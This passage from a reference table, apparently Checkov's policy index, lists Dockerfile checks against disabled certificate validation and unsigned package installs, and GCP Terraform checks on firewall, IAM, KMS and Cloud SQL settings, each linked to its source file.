[EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | -| 2131 | CKV2_DOCKER_6 | resource | ARG | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | -| 2132 | CKV2_DOCKER_6 | resource | ENV | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | -| 2133 | CKV2_DOCKER_6 | resource | RUN | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | -| 2134 | CKV2_DOCKER_7 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option | dockerfile | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml) | -| 2135 | CKV2_DOCKER_8 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option | dockerfile | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml) | -| 2136 | CKV2_DOCKER_9 | resource | RUN | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option | dockerfile | 
[RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml) | -| 2137 | CKV2_DOCKER_10 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options | dockerfile | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml) | -| 2138 | CKV2_DOCKER_11 | resource | RUN | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | dockerfile | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml) | -| 2139 | CKV2_DOCKER_12 | resource | ARG | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | -| 2140 | CKV2_DOCKER_12 | resource | ENV | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | -| 2141 | CKV2_DOCKER_12 | resource | RUN | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | -| 2142 | CKV2_DOCKER_13 | resource | RUN | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false | dockerfile | 
[RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml) | -| 2143 | CKV2_DOCKER_14 | resource | ARG | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | -| 2144 | CKV2_DOCKER_14 | resource | ENV | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | -| 2145 | CKV2_DOCKER_14 | resource | RUN | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | -| 2146 | CKV2_DOCKER_15 | resource | RUN | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option | dockerfile | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml) | -| 2147 | CKV2_DOCKER_16 | resource | ARG | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | -| 2148 | CKV2_DOCKER_16 | resource | ENV | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | 
[EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | -| 2149 | CKV2_DOCKER_16 | resource | RUN | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | -| 2150 | CKV2_DOCKER_17 | resource | RUN | Ensure that 'chpasswd' is not used to set or remove passwords | dockerfile | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml) | -| 2151 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | -| 2152 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | -| 2153 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | -| 2154 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | -| 2155 | CKV_GCP_6 | resource | 
google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | -| 2156 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | -| 2157 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | -| 2158 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | -| 2159 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | -| 2160 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | -| 2161 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | 
[GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | -| 2162 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | -| 2163 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | -| 2164 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | -| 2165 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | -| 2166 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | -| 2167 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | -| 2168 | CKV_GCP_20 | resource | google_container_cluster 
| Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | -| 2169 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | -| 2170 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | -| 2171 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | -| 2172 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | -| 2173 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | -| 2174 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | -| 2175 | 
CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | -| 2176 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | -| 2177 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | -| 2178 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | -| 2179 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 2180 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 2181 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default 
service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 2182 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 2183 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 2184 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 2185 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 2186 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 2187 | CKV_GCP_32 | resource | 
google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 2188 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | -| 2189 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 2190 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 2191 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 2192 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | 
[GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 2193 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 2194 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 2195 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 2196 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 2197 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 2198 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | -| 2199 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM 
disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | -| 2200 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 2201 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 2202 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 2203 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 2204 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 2205 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | 
[GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 2206 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | -| 2207 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | -| 2208 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | -| 2209 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | -| 2210 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | -| 2211 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | 
[GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | -| 2212 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | -| 2213 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | -| 2214 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | -| 2215 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | -| 2216 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | -| 2217 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | 
[GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | -| 2218 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | -| 2219 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | -| 2220 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | -| 2221 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | -| 2222 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | -| 2223 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | 
[GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | -| 2224 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | -| 2225 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | -| 2226 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | -| 2227 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | -| 2228 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | -| 2229 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | 
